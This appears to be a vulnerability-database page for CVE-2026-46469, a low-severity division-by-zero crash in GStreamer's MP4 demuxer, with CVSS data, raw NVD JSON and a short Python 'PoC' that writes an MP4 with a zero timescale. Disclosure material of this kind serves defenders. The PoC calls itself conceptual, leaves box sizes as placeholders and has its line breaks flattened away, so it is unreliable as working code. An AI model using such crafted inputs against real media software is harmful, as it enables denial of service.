Security Vulnerability Report
中文
CVE-2026-46469 CVSS 4.0 MEDIUM

CVE-2026-46469

Published: 2026-05-14 18:16:51
Last Modified: 2026-05-14 18:24:09
Source: [email protected]

Description

An issue was discovered in GStreamer gst-plugins-good before 1.28.2. When parsing MP4 audio tracks, the isomp4 plugin's qtdemux_parse_trak function does not sufficiently validate atom data before performing division operations, leading to denial of service due to integer division by zero.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

GStreamer gst-plugins-good < 1.28.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct # Generate a minimal MP4 file structure with a malformed atom # This PoC simulates creating an MP4 where a critical atom field is zero, # potentially triggering the division by zero in qtdemux_parse_trak. def create_malformed_mp4(filename): with open(filename, 'wb') as f: # Minimal ftyp box f.write(struct.pack('>I4s', 20, b'ftyp')) f.write(b'isom') f.write(struct.pack('>I', 0)) # Moov box start moov_start = f.tell() f.write(struct.pack('>I4s', 0, b'moov')) # Size placeholder # Trak box trak_start = f.tell() f.write(struct.pack('>I4s', 0, b'trak')) # Size placeholder # Mdia box mdia_start = f.tell() f.write(struct.pack('>I4s', 0, b'mdia')) # Size placeholder # Mdhd box (Media Header) - often contains timescale used for division # Setting timescale to 0 might trigger division by zero in duration calculations mdhd_size = 32 f.write(struct.pack('>I4s', mdhd_size, b'mdhd')) f.write(struct.pack('>I', 0)) # Version/Flags f.write(struct.pack('>I', 0)) # Creation time f.write(struct.pack('>I', 0)) # Modification time f.write(struct.pack('>I', 0)) # Timescale = 0 (MALFORMED) f.write(struct.pack('>I', 100)) # Duration f.write(struct.pack('>H', 0x55c4)) # Language f.write(struct.pack('>H', 0)) # Pre-defined # Update sizes # ... (simplified for PoC representation, actual padding needed for valid parse) # This is a conceptual PoC to demonstrate the trigger mechanism. if __name__ == '__main__': create_malformed_mp4('cve_2026_46469_poc.mp4') print('Malformed MP4 file generated: cve_2026_46469_poc.mp4')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-46469", "sourceIdentifier": "[email protected]", "published": "2026-05-14T18:16:50.653", "lastModified": "2026-05-14T18:24:08.747", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in GStreamer gst-plugins-good before 1.28.2. When parsing MP4 audio tracks, the isomp4 plugin's qtdemux_parse_trak function does not sufficiently validate atom data before performing division operations, leading to denial of service due to integer division by zero."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-369"}]}], "references": [{"url": "https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/11243.patch", "source": "[email protected]"}, {"url": "https://gstreamer.freedesktop.org/security/sa-2026-0018.html", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.